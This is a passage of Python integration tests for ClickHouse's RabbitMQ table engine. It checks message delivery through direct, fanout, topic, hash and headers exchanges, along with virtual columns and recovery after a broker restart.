DROP TABLE test.combo_{0};
'''.format(mv_id))
assert int(result) == messages_num * threads_num * NUM_MV, 'ClickHouse lost some messages: {}'.format(result)
def test_rabbitmq_insert(rabbitmq_cluster):
instance.query('''
CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'insert',
rabbitmq_exchange_type = 'direct',
rabbitmq_routing_key_list = 'insert1',
rabbitmq_format = 'TSV',
rabbitmq_row_delimiter = '\\n';
''')
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
consumer_connection = pika.BlockingConnection(parameters)
consumer = consumer_connection.channel()
result = consumer.queue_declare(queue='')
queue_name = result.method.queue
consumer.queue_bind(exchange='insert', queue=queue_name, routing_key='insert1')
values = []
for i in range(50):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.rabbitmq VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
insert_messages = []
    def onReceived(channel, method, properties, body):
        insert_messages.append(body.decode())
        if len(insert_messages) == 50:
            channel.stop_consuming()
consumer.basic_consume(onReceived, queue_name)
consumer.start_consuming()
consumer_connection.close()
result = '\n'.join(insert_messages)
rabbitmq_check_result(result, True)
def test_rabbitmq_insert_headers_exchange(rabbitmq_cluster):
instance.query('''
CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'insert_headers',
rabbitmq_exchange_type = 'headers',
rabbitmq_routing_key_list = 'test=insert,topic=headers',
rabbitmq_format = 'TSV',
rabbitmq_row_delimiter = '\\n';
''')
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
consumer_connection = pika.BlockingConnection(parameters)
consumer = consumer_connection.channel()
result = consumer.queue_declare(queue='')
queue_name = result.method.queue
consumer.queue_bind(exchange='insert_headers', queue=queue_name, routing_key="",
arguments={'x-match': 'all', 'test': 'insert', 'topic': 'headers'})
values = []
for i in range(50):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.rabbitmq VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
insert_messages = []
    def onReceived(channel, method, properties, body):
        insert_messages.append(body.decode())
        if len(insert_messages) == 50:
            channel.stop_consuming()
consumer.basic_consume(onReceived, queue_name)
consumer.start_consuming()
consumer_connection.close()
result = '\n'.join(insert_messages)
rabbitmq_check_result(result, True)
def test_rabbitmq_many_inserts(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.rabbitmq_many;
DROP TABLE IF EXISTS test.rabbitmq_consume;
DROP TABLE IF EXISTS test.view_many;
DROP TABLE IF EXISTS test.consumer_many;
CREATE TABLE test.rabbitmq_many (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'many_inserts',
rabbitmq_exchange_type = 'direct',
rabbitmq_routing_key_list = 'insert2',
rabbitmq_format = 'TSV',
rabbitmq_row_delimiter = '\\n';
CREATE TABLE test.rabbitmq_consume (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'many_inserts',
rabbitmq_exchange_type = 'direct',
rabbitmq_routing_key_list = 'insert2',
rabbitmq_format = 'TSV',
rabbitmq_row_delimiter = '\\n';
''')
messages_num = 10000
values = []
for i in range(messages_num):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
def insert():
while True:
try:
instance.query("INSERT INTO test.rabbitmq_many VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
threads = []
threads_num = 10
for _ in range(threads_num):
threads.append(threading.Thread(target=insert))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
instance.query('''
CREATE TABLE test.view_many (key UInt64, value UInt64)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer_many TO test.view_many AS
SELECT * FROM test.rabbitmq_consume;
''')
for thread in threads:
thread.join()
while True:
result = instance.query('SELECT count() FROM test.view_many')
if int(result) == messages_num * threads_num:
break
time.sleep(1)
instance.query('''
DROP TABLE test.rabbitmq_consume;
DROP TABLE test.rabbitmq_many;
DROP TABLE test.consumer_many;
DROP TABLE test.view_many;
''')
assert int(result) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result)
def test_rabbitmq_overloaded_insert(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view_overload;
DROP TABLE IF EXISTS test.consumer_overload;
DROP TABLE IF EXISTS test.rabbitmq_consume;
CREATE TABLE test.rabbitmq_consume (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'over',
rabbitmq_queue_base = 'over',
rabbitmq_exchange_type = 'direct',
rabbitmq_num_consumers = 5,
rabbitmq_num_queues = 10,
rabbitmq_max_block_size = 10000,
rabbitmq_routing_key_list = 'over',
rabbitmq_format = 'TSV',
rabbitmq_row_delimiter = '\\n';
CREATE TABLE test.rabbitmq_overload (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'over',
rabbitmq_exchange_type = 'direct',
rabbitmq_routing_key_list = 'over',
rabbitmq_format = 'TSV',
rabbitmq_row_delimiter = '\\n';
CREATE TABLE test.view_overload (key UInt64, value UInt64)
ENGINE = MergeTree
ORDER BY key
SETTINGS old_parts_lifetime=5, cleanup_delay_period=2, cleanup_delay_period_random_add=3;
CREATE MATERIALIZED VIEW test.consumer_overload TO test.view_overload AS
SELECT * FROM test.rabbitmq_consume;
''')
messages_num = 100000
def insert():
values = []
for i in range(messages_num):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.rabbitmq_overload VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
threads = []
threads_num = 5
for _ in range(threads_num):
threads.append(threading.Thread(target=insert))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
while True:
result = instance.query('SELECT count() FROM test.view_overload')
time.sleep(1)
if int(result) == messages_num * threads_num:
break
instance.query('''
DROP TABLE test.consumer_overload;
DROP TABLE test.view_overload;
DROP TABLE test.rabbitmq_consume;
DROP TABLE test.rabbitmq_overload;
''')
for thread in threads:
thread.join()
assert int(result) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result)
def test_rabbitmq_direct_exchange(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination(key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key
SETTINGS old_parts_lifetime=5, cleanup_delay_period=2, cleanup_delay_period_random_add=3;
''')
num_tables = 5
for consumer_id in range(num_tables):
print(("Setting up table {}".format(consumer_id)))
instance.query('''
DROP TABLE IF EXISTS test.direct_exchange_{0};
DROP TABLE IF EXISTS test.direct_exchange_{0}_mv;
CREATE TABLE test.direct_exchange_{0} (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_num_consumers = 2,
rabbitmq_num_queues = 2,
rabbitmq_exchange_name = 'direct_exchange_testing',
rabbitmq_exchange_type = 'direct',
rabbitmq_routing_key_list = 'direct_{0}',
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.direct_exchange_{0}_mv TO test.destination AS
SELECT key, value FROM test.direct_exchange_{0};
'''.format(consumer_id))
i = [0]
messages_num = 1000
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
messages = []
for _ in range(messages_num):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
key_num = 0
for num in range(num_tables):
key = "direct_" + str(key_num)
key_num += 1
for message in messages:
mes_id = str(randrange(10))
channel.basic_publish(
exchange='direct_exchange_testing', routing_key=key,
properties=pika.BasicProperties(message_id=mes_id), body=message)
connection.close()
while True:
result = instance.query('SELECT count() FROM test.destination')
time.sleep(1)
if int(result) == messages_num * num_tables:
break
for consumer_id in range(num_tables):
instance.query('''
DROP TABLE test.direct_exchange_{0}_mv;
DROP TABLE test.direct_exchange_{0};
'''.format(consumer_id))
instance.query('''
DROP TABLE IF EXISTS test.destination;
''')
assert int(result) == messages_num * num_tables, 'ClickHouse lost some messages: {}'.format(result)
def test_rabbitmq_fanout_exchange(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination(key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
''')
num_tables = 5
for consumer_id in range(num_tables):
print(("Setting up table {}".format(consumer_id)))
instance.query('''
DROP TABLE IF EXISTS test.fanout_exchange_{0};
DROP TABLE IF EXISTS test.fanout_exchange_{0}_mv;
CREATE TABLE test.fanout_exchange_{0} (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_num_consumers = 2,
rabbitmq_num_queues = 2,
rabbitmq_routing_key_list = 'key_{0}',
rabbitmq_exchange_name = 'fanout_exchange_testing',
rabbitmq_exchange_type = 'fanout',
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.fanout_exchange_{0}_mv TO test.destination AS
SELECT key, value FROM test.fanout_exchange_{0};
'''.format(consumer_id))
i = [0]
messages_num = 1000
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
messages = []
for _ in range(messages_num):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
for msg_id in range(messages_num):
channel.basic_publish(exchange='fanout_exchange_testing', routing_key='',
properties=pika.BasicProperties(message_id=str(msg_id)), body=messages[msg_id])
connection.close()
while True:
result = instance.query('SELECT count() FROM test.destination')
time.sleep(1)
if int(result) == messages_num * num_tables:
break
for consumer_id in range(num_tables):
instance.query('''
DROP TABLE test.fanout_exchange_{0}_mv;
DROP TABLE test.fanout_exchange_{0};
'''.format(consumer_id))
instance.query('''
DROP TABLE test.destination;
''')
assert int(result) == messages_num * num_tables, 'ClickHouse lost some messages: {}'.format(result)
def test_rabbitmq_topic_exchange(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination(key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
''')
num_tables = 5
for consumer_id in range(num_tables):
print(("Setting up table {}".format(consumer_id)))
instance.query('''
DROP TABLE IF EXISTS test.topic_exchange_{0};
DROP TABLE IF EXISTS test.topic_exchange_{0}_mv;
CREATE TABLE test.topic_exchange_{0} (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_num_consumers = 2,
rabbitmq_num_queues = 2,
rabbitmq_exchange_name = 'topic_exchange_testing',
rabbitmq_exchange_type = 'topic',
rabbitmq_routing_key_list = '*.{0}',
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.topic_exchange_{0}_mv TO test.destination AS
SELECT key, value FROM test.topic_exchange_{0};
'''.format(consumer_id))
for consumer_id in range(num_tables):
print(("Setting up table {}".format(num_tables + consumer_id)))
instance.query('''
DROP TABLE IF EXISTS test.topic_exchange_{0};
DROP TABLE IF EXISTS test.topic_exchange_{0}_mv;
CREATE TABLE test.topic_exchange_{0} (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_num_consumers = 2,
rabbitmq_num_queues = 2,
rabbitmq_exchange_name = 'topic_exchange_testing',
rabbitmq_exchange_type = 'topic',
rabbitmq_routing_key_list = '*.logs',
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.topic_exchange_{0}_mv TO test.destination AS
SELECT key, value FROM test.topic_exchange_{0};
'''.format(num_tables + consumer_id))
i = [0]
messages_num = 1000
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
messages = []
for _ in range(messages_num):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
key_num = 0
for num in range(num_tables):
key = "topic." + str(key_num)
key_num += 1
for message in messages:
channel.basic_publish(exchange='topic_exchange_testing', routing_key=key, body=message)
key = "random.logs"
current = 0
for msg_id in range(messages_num):
channel.basic_publish(exchange='topic_exchange_testing', routing_key=key,
properties=pika.BasicProperties(message_id=str(msg_id)), body=messages[msg_id])
connection.close()
while True:
result = instance.query('SELECT count() FROM test.destination')
time.sleep(1)
if int(result) == messages_num * num_tables + messages_num * num_tables:
break
for consumer_id in range(num_tables * 2):
instance.query('''
DROP TABLE test.topic_exchange_{0}_mv;
DROP TABLE test.topic_exchange_{0};
'''.format(consumer_id))
instance.query('''
DROP TABLE test.destination;
''')
    assert int(result) == messages_num * num_tables + messages_num * num_tables, \
        'ClickHouse lost some messages: {}'.format(result)
def test_rabbitmq_hash_exchange(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination(key UInt64, value UInt64, channel_id String)
ENGINE = MergeTree()
ORDER BY key;
''')
num_tables = 4
for consumer_id in range(num_tables):
table_name = 'rabbitmq_consumer{}'.format(consumer_id)
print(("Setting up {}".format(table_name)))
instance.query('''
DROP TABLE IF EXISTS test.{0};
DROP TABLE IF EXISTS test.{0}_mv;
CREATE TABLE test.{0} (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_num_consumers = 4,
rabbitmq_num_queues = 2,
rabbitmq_exchange_type = 'consistent_hash',
rabbitmq_exchange_name = 'hash_exchange_testing',
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.{0}_mv TO test.destination AS
SELECT key, value, _channel_id AS channel_id FROM test.{0};
'''.format(table_name))
i = [0]
messages_num = 500
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
def produce():
        # Open the connection inside each producer thread; pika connections are not thread-safe.
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
messages = []
for _ in range(messages_num):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
for msg_id in range(messages_num):
channel.basic_publish(exchange='hash_exchange_testing', routing_key=str(msg_id),
properties=pika.BasicProperties(message_id=str(msg_id)), body=messages[msg_id])
connection.close()
threads = []
threads_num = 10
for _ in range(threads_num):
threads.append(threading.Thread(target=produce))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
result1 = ''
while True:
result1 = instance.query('SELECT count() FROM test.destination')
time.sleep(1)
if int(result1) == messages_num * threads_num:
break
result2 = instance.query("SELECT count(DISTINCT channel_id) FROM test.destination")
for consumer_id in range(num_tables):
table_name = 'rabbitmq_consumer{}'.format(consumer_id)
instance.query('''
DROP TABLE test.{0}_mv;
DROP TABLE test.{0};
'''.format(table_name))
instance.query('''
DROP TABLE test.destination;
''')
for thread in threads:
thread.join()
    assert int(result1) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result1)
assert int(result2) == 4 * num_tables
def test_rabbitmq_multiple_bindings(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination(key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
''')
instance.query('''
DROP TABLE IF EXISTS test.bindings;
DROP TABLE IF EXISTS test.bindings_mv;
CREATE TABLE test.bindings (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'multiple_bindings_testing',
rabbitmq_exchange_type = 'direct',
rabbitmq_routing_key_list = 'key1,key2,key3,key4,key5',
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.bindings_mv TO test.destination AS
SELECT * FROM test.bindings;
''')
i = [0]
messages_num = 500
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
def produce():
        # Open the connection inside each producer thread; pika connections are not thread-safe.
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
messages = []
for _ in range(messages_num):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
keys = ['key1', 'key2', 'key3', 'key4', 'key5']
for key in keys:
for message in messages:
channel.basic_publish(exchange='multiple_bindings_testing', routing_key=key, body=message)
connection.close()
threads = []
threads_num = 10
for _ in range(threads_num):
threads.append(threading.Thread(target=produce))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
while True:
result = instance.query('SELECT count() FROM test.destination')
time.sleep(1)
if int(result) == messages_num * threads_num * 5:
break
for thread in threads:
thread.join()
instance.query('''
DROP TABLE test.bindings;
DROP TABLE test.bindings_mv;
DROP TABLE test.destination;
''')
assert int(result) == messages_num * threads_num * 5, 'ClickHouse lost some messages: {}'.format(result)
def test_rabbitmq_headers_exchange(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination(key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
''')
num_tables_to_receive = 2
for consumer_id in range(num_tables_to_receive):
print(("Setting up table {}".format(consumer_id)))
instance.query('''
DROP TABLE IF EXISTS test.headers_exchange_{0};
DROP TABLE IF EXISTS test.headers_exchange_{0}_mv;
CREATE TABLE test.headers_exchange_{0} (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_num_consumers = 2,
rabbitmq_exchange_name = 'headers_exchange_testing',
rabbitmq_exchange_type = 'headers',
rabbitmq_routing_key_list = 'x-match=all,format=logs,type=report,year=2020',
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.headers_exchange_{0}_mv TO test.destination AS
SELECT key, value FROM test.headers_exchange_{0};
'''.format(consumer_id))
num_tables_to_ignore = 2
for consumer_id in range(num_tables_to_ignore):
print(("Setting up table {}".format(consumer_id + num_tables_to_receive)))
instance.query('''
DROP TABLE IF EXISTS test.headers_exchange_{0};
DROP TABLE IF EXISTS test.headers_exchange_{0}_mv;
CREATE TABLE test.headers_exchange_{0} (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'headers_exchange_testing',
rabbitmq_exchange_type = 'headers',
rabbitmq_routing_key_list = 'x-match=all,format=logs,type=report,year=2019',
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.headers_exchange_{0}_mv TO test.destination AS
SELECT key, value FROM test.headers_exchange_{0};
'''.format(consumer_id + num_tables_to_receive))
i = [0]
messages_num = 1000
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
messages = []
for _ in range(messages_num):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
fields = {}
fields['format'] = 'logs'
fields['type'] = 'report'
fields['year'] = '2020'
for msg_id in range(messages_num):
channel.basic_publish(exchange='headers_exchange_testing', routing_key='',
properties=pika.BasicProperties(headers=fields, message_id=str(msg_id)),
body=messages[msg_id])
connection.close()
while True:
result = instance.query('SELECT count() FROM test.destination')
time.sleep(1)
if int(result) == messages_num * num_tables_to_receive:
break
for consumer_id in range(num_tables_to_receive + num_tables_to_ignore):
instance.query('''
DROP TABLE test.headers_exchange_{0}_mv;
DROP TABLE test.headers_exchange_{0};
'''.format(consumer_id))
instance.query('''
DROP TABLE test.destination;
''')
assert int(result) == messages_num * num_tables_to_receive, 'ClickHouse lost some messages: {}'.format(result)
def test_rabbitmq_virtual_columns(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
CREATE TABLE test.rabbitmq_virtuals (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'virtuals',
rabbitmq_format = 'JSONEachRow';
CREATE MATERIALIZED VIEW test.view Engine=Log AS
SELECT value, key, _exchange_name, _channel_id, _delivery_tag, _redelivered FROM test.rabbitmq_virtuals;
''')
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
message_num = 10
i = 0
messages = []
for _ in range(message_num):
messages.append(json.dumps({'key': i, 'value': i}))
i += 1
for message in messages:
channel.basic_publish(exchange='virtuals', routing_key='', body=message)
while True:
result = instance.query('SELECT count() FROM test.view')
time.sleep(1)
if int(result) == message_num:
break
connection.close()
result = instance.query('''
SELECT key, value, _exchange_name, SUBSTRING(_channel_id, 1, 3), _delivery_tag, _redelivered
FROM test.view ORDER BY key
''')
expected = '''\
0 0 virtuals 1_0 1 0
1 1 virtuals 1_0 2 0
2 2 virtuals 1_0 3 0
3 3 virtuals 1_0 4 0
4 4 virtuals 1_0 5 0
5 5 virtuals 1_0 6 0
6 6 virtuals 1_0 7 0
7 7 virtuals 1_0 8 0
8 8 virtuals 1_0 9 0
9 9 virtuals 1_0 10 0
'''
instance.query('''
DROP TABLE test.rabbitmq_virtuals;
DROP TABLE test.view;
''')
assert TSV(result) == TSV(expected)
def test_rabbitmq_virtual_columns_with_materialized_view(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.rabbitmq_virtuals_mv (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'virtuals_mv',
rabbitmq_format = 'JSONEachRow';
CREATE TABLE test.view (key UInt64, value UInt64,
exchange_name String, channel_id String, delivery_tag UInt64, redelivered UInt8) ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT *, _exchange_name as exchange_name, _channel_id as channel_id, _delivery_tag as delivery_tag, _redelivered as redelivered
FROM test.rabbitmq_virtuals_mv;
''')
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
message_num = 10
i = 0
messages = []
for _ in range(message_num):
messages.append(json.dumps({'key': i, 'value': i}))
i += 1
for message in messages:
channel.basic_publish(exchange='virtuals_mv', routing_key='', body=message)
while True:
result = instance.query('SELECT count() FROM test.view')
time.sleep(1)
if int(result) == message_num:
break
connection.close()
result = instance.query(
"SELECT key, value, exchange_name, SUBSTRING(channel_id, 1, 3), delivery_tag, redelivered FROM test.view ORDER BY delivery_tag")
expected = '''\
0 0 virtuals_mv 1_0 1 0
1 1 virtuals_mv 1_0 2 0
2 2 virtuals_mv 1_0 3 0
3 3 virtuals_mv 1_0 4 0
4 4 virtuals_mv 1_0 5 0
5 5 virtuals_mv 1_0 6 0
6 6 virtuals_mv 1_0 7 0
7 7 virtuals_mv 1_0 8 0
8 8 virtuals_mv 1_0 9 0
9 9 virtuals_mv 1_0 10 0
'''
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
DROP TABLE test.rabbitmq_virtuals_mv
''')
assert TSV(result) == TSV(expected)
def test_rabbitmq_many_consumers_to_each_queue(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination(key UInt64, value UInt64, channel_id String)
ENGINE = MergeTree()
ORDER BY key;
''')
num_tables = 4
for table_id in range(num_tables):
print(("Setting up table {}".format(table_id)))
instance.query('''
DROP TABLE IF EXISTS test.many_consumers_{0};
DROP TABLE IF EXISTS test.many_consumers_{0}_mv;
CREATE TABLE test.many_consumers_{0} (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'many_consumers',
rabbitmq_num_queues = 2,
rabbitmq_num_consumers = 2,
rabbitmq_queue_base = 'many_consumers',
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.many_consumers_{0}_mv TO test.destination AS
SELECT key, value, _channel_id as channel_id FROM test.many_consumers_{0};
'''.format(table_id))
i = [0]
messages_num = 1000
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
def produce():
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
messages = []
for _ in range(messages_num):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
for msg_id in range(messages_num):
channel.basic_publish(exchange='many_consumers', routing_key='',
properties=pika.BasicProperties(message_id=str(msg_id)), body=messages[msg_id])
connection.close()
threads = []
threads_num = 20
for _ in range(threads_num):
threads.append(threading.Thread(target=produce))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
result1 = ''
while True:
result1 = instance.query('SELECT count() FROM test.destination')
time.sleep(1)
if int(result1) == messages_num * threads_num:
break
result2 = instance.query("SELECT count(DISTINCT channel_id) FROM test.destination")
for thread in threads:
thread.join()
for consumer_id in range(num_tables):
instance.query('''
DROP TABLE test.many_consumers_{0};
DROP TABLE test.many_consumers_{0}_mv;
'''.format(consumer_id))
instance.query('''
DROP TABLE test.destination;
''')
    assert int(result1) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result1)
# 4 tables, 2 consumers for each table => 8 consumer tags
assert int(result2) == 8
def test_rabbitmq_restore_failed_connection_without_losses_1(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.consume;
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree
ORDER BY key;
CREATE TABLE test.consume (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'producer_reconnect',
rabbitmq_format = 'JSONEachRow',
rabbitmq_num_consumers = 2,
rabbitmq_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.consume;
DROP TABLE IF EXISTS test.producer_reconnect;
CREATE TABLE test.producer_reconnect (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'producer_reconnect',
rabbitmq_persistent = '1',
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
''')
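    # Assumption from the setting's documented meaning: rabbitmq_persistent = '1'
    # makes INSERTs into test.producer_reconnect publish persistent messages
    # (delivery_mode=2), which is what lets the data survive the broker restart below.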
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
messages_num = 100000
values = []
for i in range(messages_num):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.producer_reconnect VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
while int(instance.query('SELECT count() FROM test.view')) == 0:
time.sleep(0.1)
kill_rabbitmq(rabbitmq_cluster.rabbitmq_docker_id)
time.sleep(4)
revive_rabbitmq(rabbitmq_cluster.rabbitmq_docker_id)
while True:
result = instance.query('SELECT count(DISTINCT key) FROM test.view')
time.sleep(1)
if int(result) == messages_num:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
DROP TABLE test.consume;
DROP TABLE test.producer_reconnect;
''')
assert int(result) == messages_num, 'ClickHouse lost some messages: {}'.format(result)
def test_rabbitmq_restore_failed_connection_without_losses_2(rabbitmq_cluster):
instance.query('''
CREATE TABLE test.consumer_reconnect (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
